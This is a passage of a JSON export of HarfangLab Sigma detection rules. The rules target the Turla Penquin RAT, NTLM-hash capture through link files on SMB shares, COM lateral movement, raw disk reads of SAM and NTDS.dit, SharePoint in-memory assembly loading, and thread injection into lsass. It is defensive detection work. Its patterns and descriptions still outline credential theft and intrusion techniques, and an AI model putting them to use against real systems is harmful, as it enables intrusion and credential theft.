"https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1059/004/",
"https://attack.mitre.org/tactics/TA0002/",
"https://attack.mitre.org/groups/G0010/",
"https://attack.mitre.org/software/S0587/"
],
"name": "t1105_penquin_turla_suspicious_execution.yml",
"content": "title: Suspicious Execution Related to Penquin\nid: 8e636923-4f5f-48f2-870d-b76e0ea0e15c\ndescription: |\n Detects the execution of files with names linked to the malware Penquin.\n Penquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\n The execution of these files is related to the usage of the \"start\" or \"exec\" command by the C&C server on an infected system.\n This command downloads and executes an arbitrary file provided by the C&C server on the infected host.\n Note that the rule matches only the hard-coded paths listed below; samples dropped under other names will not trigger it.\n It is recommended to investigate the parent process performing this action.\nreferences:\n - https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/tactics/TA0002/\n - https://attack.mitre.org/groups/G0010/\n - https://attack.mitre.org/software/S0587/\ndate: 2023/01/11\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.command_and_control\n - attack.t1105\n - attack.g0010\n - attack.s0587\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.ThreatActor.Turla\n - classification.Linux.Malware.Penquin\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n - Image:\n - '/tmp/.xdfg' # Penquin, Penquin_2.0\n - '/root/.hsperfdata' # Penquin_x64\n - '/tmp/.sync.pid' # Penquin_x64\n - CommandLine|contains:\n - '/tmp/.xdfg' # Penquin, Penquin_2.0\n - '/root/.hsperfdata' # Penquin_x64\n - '/tmp/.sync.pid' # Penquin_x64\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e636923-4f5f-48f2-870d-b76e0ea0e15c",
"rule_name": "Suspicious Execution Related to Penquin",
"rule_description": "Detects the execution of files with names linked to the malware Penquin.\nPenquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\nThe execution of these files is related to the usage of the \"start\" or \"exec\" command by the C&C server on an infected system.\nThis command downloads and executes an arbitrary file provided by the C&C server on the infected host.\nNote that the rule matches only a hard-coded set of file paths; samples dropped under other names will not trigger it.\nIt is recommended to investigate the parent process performing this action.\n",
"rule_creation_date": "2023-01-11",
"rule_modified_date": "2025-02-03",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e86e07b-ba70-4981-ad8f-1b5f178d1b2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618627Z",
"creation_date": "2026-03-23T11:45:34.618629Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618633Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mdsecactivebreach/Farmer",
"https://github.com/barretgo/ntlm_theft",
"https://attack.mitre.org/techniques/T1557/001/",
"https://attack.mitre.org/software/S0174/"
],
"name": "t1557_001_suspicious_link_file.yml",
"content": "title: Potentially Malicious Link File Copied to an SMB Share\nid: 8e86e07b-ba70-4981-ad8f-1b5f178d1b2e\ndescription: |\n Detects the copy/move of a suspicious link file to an SMB share. These files can contain malicious redirections on their icons or other elements to force authentication.\n LLMNR Poisoning attacks occur when malicious actors spoof a legitimate authentication to capture the NTLMv2 hash of an authenticating user.\n Attackers can set up a listener in a machine they control to capture the authentication request made by users browsing to the folders where these files exist, as loading the icon will force an authentication request.\n To investigate this alert, it is recommended to download the link file to see if it contains any malicious redirections in its fields. Preferably through a non-graphical interface or an isolated environment.\n LLMNR Poisoning can also be mitigated by disabling it through a group policy or by enabling SMB signing. However, this is known to make SMB requests ~50% slower.\n Is recommended to analyze both the process responsible for the action and the copied link file to look for malicious content or actions.\nreferences:\n - https://github.com/mdsecactivebreach/Farmer\n - https://github.com/barretgo/ntlm_theft\n - https://attack.mitre.org/techniques/T1557/001/\n - https://attack.mitre.org/software/S0174/\ndate: 2023/05/25\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1557.001\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\xcopy.exe'\n - '\\robocopy.exe'\n # Renamed binaries\n - OriginalFileName:\n - 
'xcopy.exe'\n - 'robocopy.exe'\n\n selection_cmdline:\n # Shell primitive, no image.\n CommandLine|contains:\n - ' copy '\n - ' move '\n - ' mv '\n\n selection_smb_share:\n # It is common to see files starting with symbols, propping them to the top of the share.\n # This is so the user doesn't have to scroll through to browse them.\n CommandLine|endswith:\n - '\\\\\\\\*\\@*.url'\n - '\\\\\\\\*\\@*.lnk'\n - '\\\\\\\\*\\@*.ico'\n - '\\\\\\\\*\\#*.url'\n - '\\\\\\\\*\\#*.lnk'\n - '\\\\\\\\*\\#*.ico'\n - '\\\\\\\\*\\!*.url'\n - '\\\\\\\\*\\!*.lnk'\n - '\\\\\\\\*\\!*.ico'\n - '\\\\\\\\*\\0*.url'\n - '\\\\\\\\*\\0*.lnk'\n - '\\\\\\\\*\\0*.ico'\n\n condition: (selection_bin or selection_cmdline) and selection_smb_share\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e86e07b-ba70-4981-ad8f-1b5f178d1b2e",
"rule_name": "Potentially Malicious Link File Copied to an SMB Share",
"rule_description": "Detects the copy/move of a suspicious link file to an SMB share. These files can contain malicious redirections on their icons or other elements to force authentication.\nLLMNR Poisoning attacks occur when malicious actors spoof a legitimate authentication to capture the NTLMv2 hash of an authenticating user.\nAttackers can set up a listener on a machine they control to capture the authentication request made by users browsing to the folders where these files exist, as loading the icon will force an authentication request.\nTo investigate this alert, it is recommended to download the link file to see if it contains any malicious redirections in its fields, preferably through a non-graphical interface or an isolated environment, since rendering the file in a graphical shell may itself trigger the outbound authentication.\nLLMNR Poisoning can also be mitigated by disabling it through a group policy or by enabling SMB signing (signing prevents relaying the captured authentication to other hosts; it does not prevent the capture itself). However, this is known to make SMB requests ~50% slower.\nIt is recommended to analyze both the process responsible for the action and the copied link file to look for malicious content or actions.\n",
"rule_creation_date": "2023-05-25",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1557.001",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8e9c7e02-4778-4c05-9023-5515bbbb98a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626451Z",
"creation_date": "2026-03-23T11:45:34.626452Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626457Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/lateral-movement-via-dcom-abusing-control-panel/118232/",
"https://github.com/klsecservices/CPLDCOMTrigger",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_cpl_lateral_movement_com.yml",
"content": "title: Control Panel Lateral Movement via COM\nid: 8e9c7e02-4778-4c05-9023-5515bbbb98a8\ndescription: |\n Detects a control panel entry being installed remotely in the Windows registry.\n Threat actors can remotely drop a malicious DLL, register it as a new control panel item, and then trigger its execution through the COpenControlPanel COM interface.\n It is recommended to audit the newly added CPL file created in \"C:\\Windows\\System32\" and investigate the source IP of the remote session for signs of malicious activity.\nreferences:\n - https://securelist.com/lateral-movement-via-dcom-abusing-control-panel/118232/\n - https://github.com/klsecservices/CPLDCOMTrigger\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2025/12/22\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_registry_cpl:\n EventType: CreateKey\n TargetObject|startswith:\n - 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls'\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls'\n\n selection_remote:\n - SessionLogonType: 3\n - ProcessSessionLogonType: 3\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8e9c7e02-4778-4c05-9023-5515bbbb98a8",
"rule_name": "Control Panel Lateral Movement via COM",
"rule_description": "Detects a control panel entry being installed remotely in the Windows registry.\nThreat actors can remotely drop a malicious DLL, register it as a new control panel item, and then trigger its execution through the COpenControlPanel COM interface.\nIt is recommended to audit the newly added CPL file created in \"C:\\Windows\\System32\" and investigate the source IP of the remote session for signs of malicious activity.\n",
"rule_creation_date": "2025-12-22",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ea00c00-8d43-40e6-823a-15ebf355f8da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625954Z",
"creation_date": "2026-03-23T11:45:34.625963Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625967Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mallo-m/AxiomSecrets",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1006_raw_device_access_sensitive_files.yml",
"content": "title: Raw Device Access to Sensitive Files\nid: 8ea00c00-8d43-40e6-823a-15ebf355f8da\ndescription: |\n Detects a raw device access to sensitive files.\n Accessing raw devices is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\n This kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\n If abused, it can lead to privilege escalation, credential theft, or complete system compromise.\n It is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\nreferences:\n - https://github.com/mallo-m/AxiomSecrets\n - https://attack.mitre.org/techniques/T1006/\ndate: 2025/11/21\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.003\n - classification.Windows.Source.RawDeviceAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: raw_device_access\ndetection:\n selection:\n ProcessCommandLine|contains:\n - '?:\\Windows\\System32\\config\\SAM'\n - '?:\\Windows\\System32\\config\\SYSTEM'\n - '?:\\Windows\\System32\\config\\SECURITY'\n - '?:\\Windows\\NTDS\\ntds.dit'\n\n exclusion_systemprofile:\n ProcessCommandLine|contains:\n - '?:\\WINDOWS\\System32\\config\\systemprofile'\n - '?:\\Windows\\System32\\config\\SYSTEM~1\\'\n\n exclusion_siemens:\n ProcessCommandLine|contains:\n - '?:\\Windows\\system32\\reg.exe LOAD HKLM\\TempVMHost ?:\\Windows\\system32\\config\\System'\n - '?:\\Windows\\system32\\reg.exe LOAD HKLM\\TempChainedVMHost ?:\\Windows\\system32\\config\\System'\n ProcessCurrentDirectory|startswith: '?:\\sysmgmt\\sd_store\\'\n\n exclusion_swsetup:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\cacls.exe ?:\\WINDOWS\\system32\\config\\system'\n\n 
condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ea00c00-8d43-40e6-823a-15ebf355f8da",
"rule_name": "Raw Device Access to Sensitive Files",
"rule_description": "Detects a raw device access to sensitive files.\nAccessing raw devices is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\nThis kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\nIf abused, it can lead to privilege escalation, credential theft, or complete system compromise.\nIt is recommended to investigate the context of this action and any other alerts to determine its legitimacy.\n",
"rule_creation_date": "2025-11-21",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ea99f0f-186c-4987-97e7-36e73dd41eea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079496Z",
"creation_date": "2026-03-23T11:45:34.079498Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1620_suspicious_dotnet_sharepoint.yml",
"content": "title: Suspicious Dotnet Assembly Loaded by Sharepoint Server\nid: 8ea99f0f-186c-4987-97e7-36e73dd41eea\ndescription: |\n Detects the loading of a suspicious .NET assembly by SharePoint Server.\n The rule targets unsigned assemblies (PublicKeyToken=null) with a default version whose module path does not point to a file on a local drive, a pattern consistent with in-memory assembly loading.\n Attackers may dynamically load assemblies in SharePoint to stealthily execute further actions.\n It is recommended to investigate the IIS processes near and after the load for suspicious behavior.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2025/07/25\nmodified: 2025/08/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_assembly:\n AssemblyFlags: '0x0'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ProcessName: 'w3wp.exe'\n\n selection_app_sharepoint:\n - ProcessCommandLine|contains: 'sharepoint'\n ProcessName: 'w3wp.exe'\n - ProcessParentCommandLine|contains: 'sharepoint'\n ProcessParentName: 'w3wp.exe'\n - ProcessGrandparentCommandLine|contains: 'sharepoint'\n ProcessGrandparentName: 'w3wp.exe'\n\n filter_path:\n ModuleILPath|contains: ':\\'\n\n exclusion_unknown:\n FullyQualifiedAssemblyName: '????????, Version=?.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n exclusion_xoml:\n FullyQualifiedAssemblyName: 'Xoml.*, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ea99f0f-186c-4987-97e7-36e73dd41eea",
"rule_name": "Suspicious Dotnet Assembly Loaded by Sharepoint Server",
"rule_description": "Detects the loading of a suspicious .NET assembly by SharePoint Server.\nThe rule targets unsigned assemblies (PublicKeyToken=null) with a default version whose module path does not point to a file on a local drive, a pattern consistent with in-memory assembly loading.\nAttackers may dynamically load assemblies in SharePoint to stealthily execute further actions.\nIt is recommended to investigate the IIS processes near and after the load for suspicious behavior.\n",
"rule_creation_date": "2025-07-25",
"rule_modified_date": "2025-08-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f01bb75-5129-4ec1-bf05-a350afd2e6f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628562Z",
"creation_date": "2026-03-23T11:45:34.628564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628568Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_remote_thread_sensitive_process.yml",
"content": "title: Suspicious Remote Thread Created in Sensitive Process\nid: 8f01bb75-5129-4ec1-bf05-a350afd2e6f3\ndescription: |\n Detects suspicious remote threads that are not mapped to a legitimate DLL/executable created in sensitive processes.\n Adversaries may inject malicious code in another processes to steal sensitive information, evade defenses, elevate privileges or perform malicious activity within a legitimate process.\n It is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/11\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith:\n - '\\lsass.exe'\n - '\\winlogon.exe'\n - '\\trustedinstaller.exe'\n - '\\wininit.exe'\n - '\\services.exe'\n - '\\smss.exe'\n - '\\csrss.exe'\n\n filter_module:\n StartModule|contains:\n - '.dll'\n - '.exe'\n - '.com'\n\n exclusion_security_product:\n SourceImage:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\appprotection.exe'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\entryprotect.exe'\n - '?:\\Program Files (x86)\\Citrix\\Online Plugin\\ICA Client\\appprotection.exe'\n - '?:\\Program Files (x86)\\Citrix\\Online Plugin\\ICA Client\\entryprotect.exe'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSNMVInj.dll'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSNAEInj64.dll'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\helper_64.exe'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\appprotection.exe'\n - 
'?:\\Program Files (x86)\\F-Secure\\Client Security\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n - '?:\\Program Files (x86)\\F-Secure\\Server Security\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n - '?:\\Program Files (x86)\\F-Secure\\PSB\\Ultralight\\ulcore\\\\*\\fsulprothoster.exe'\n - '?:\\Program Files (x86)\\0patch\\Agent\\0patchServicex64.exe'\n - '?:\\Program Files\\Cisco\\AMP\\\\*\\sfc.exe'\n\n exclusion_wmiprvse:\n SourceImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_logmein:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'LogMeIn, Inc.'\n - 'GoTo Technologies USA, LLC'\n\n exclusion_fsecure:\n ProcessProcessName:\n - 'fshoster64.exe'\n - 'FSHDLL64.EXE'\n - 'fshoster32.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'WithSecure Oyj'\n - 'F-Secure Corporation'\n\n exclusion_windhawk:\n - ProcessProcessName: 'windhawk.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Michael Maltsev'\n - 'Open Source Developer, Michael Maltsev'\n - ProcessImage: '?:\\Program Files\\Windhawk\\windhawk.exe'\n ProcessCompany: 'Ramen Software'\n TargetImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n\n exclusion_netsupport:\n ProcessImage: '?:\\Program Files\\NetSupport\\NetSupport Manager\\client32.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NetSupport Ltd'\n\n exclusion_artistscope:\n ProcessImage: '?:\\Program Files\\Common Files\\ArtistScope\\CSHelper64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ArtistScope Pty Ltd'\n\n exclusion_mcafee:\n ProcessImage:\n - '?:\\Program Files\\McAfee\\DLP\\Agent\\fcags.exe'\n - '?:\\Program Files\\McAfee\\Host Intrusion Prevention\\FireSvc.exe'\n - '*\\McAfee\\Endpoint Security\\Threat Prevention\\mfetp.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\\\*\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfeeTmpInstall_Threat Prevention\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfeeTmpInstall_Common\\mfeepmpk_utility.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 
'Musarubra US LLC'\n\n exclusion_warsaw:\n ProcessImage:\n - '?:\\Program Files (x86)\\Topaz OFD\\Warsaw\\core.exe'\n - '?:\\Program Files\\Topaz OFD\\Warsaw\\core.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TPZ SOLUCOES DIGITAIS LTDA'\n\n exclusion_btpass:\n ProcessImage: '?:\\Windows\\BTPass\\x64\\BTPassSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'QUEST SOFTWARE INC.'\n - 'QUEST SOFTWARE, INC.'\n\n exclusion_panda:\n ProcessImage: '?:\\Program Files (x86)\\Panda Security\\WAC\\helper_64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Panda Security, S.L.U'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgentAssist.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_netop:\n ProcessImage: '?:\\Program Files (x86)\\Netop\\Netop Remote Control\\Host\\NHOSTSVC.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'NETOP BUSINESS SOLUTIONS A/S'\n\n exclusion_roblox:\n ProcessImage|endswith: '\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n\n exclusion_radmin:\n ProcessImage|endswith: '\\rserver3.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Famatech International Corp.'\n TargetImage: '?:\\Windows\\System32\\winlogon.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8f01bb75-5129-4ec1-bf05-a350afd2e6f3",
"rule_name": "Suspicious Remote Thread Created in Sensitive Process",
"rule_description": "Detects suspicious remote threads created in sensitive processes whose start address is not mapped to a DLL or executable module.\nAdversaries may inject malicious code into another process to steal sensitive information, evade defenses, elevate privileges or perform malicious activity within a legitimate process.\nIt is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8f0ba3e3-bdb8-4dfa-bdab-69e77fd82f98",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069841Z",
"creation_date": "2026-03-23T11:45:34.069844Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069848Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.logpoint.com/en/blog/emerging-threats/hiding-in-plain-sight-the-subtle-art-of-loki-malwares-obfuscation/",
"https://attack.mitre.org/techniques/T1027/010/"
],
"name": "t1027_010_commandline_obf_uppercase.yml",
